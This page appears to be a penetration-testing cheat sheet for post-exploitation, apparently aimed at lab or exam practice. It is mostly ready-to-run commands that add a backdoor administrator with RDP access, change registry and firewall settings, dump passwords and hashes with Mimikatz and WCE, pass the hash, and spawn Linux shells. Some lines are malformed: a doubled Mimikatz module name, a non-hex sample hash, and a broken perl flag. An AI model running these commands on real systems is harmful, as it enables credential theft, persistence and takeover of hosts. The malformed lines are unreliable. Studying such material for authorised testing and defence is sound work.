Post exploitation
Don't.stop.here.you.are.only.halfway.

Proof.txt

Linux
cat /root/proof.txt
Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Windows

Add RDP user

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP

Via registry:
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Add firewall rule:
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Rdesktop resolution

rdesktop -g 1024x768 x.x.x.x

Passwords and hashes

Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords
Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token
privilege::debug
log sekurlsa.log
token::elevate
Dump SAM
privilege::debug
log sekurlsa.log
lsadump::sam

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/
www.ampliasecurity.com
C:\> wce -w

Networking

Is there a connection with another host?
netstat -ano
Hosts file
C:\WINDOWS\System32\drivers\etc\hosts
Firewall config
netsh firewall show state
netsh firewall show config
netsh dump

PowerShell tools

Empire

GitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.
GitHub

PowerSploit

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework
GitHub

Linux

Spawn TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/bash -i
/bin/sh -i
perl —e 'exec "/bin/sh";'
Copy link
On this page
Proof.txt
Windows
Add RDP user
Enable RDP
Rdesktop resolution
Passwords and hashes
Networking
PowerShell tools
Linux
Spawn TTY shell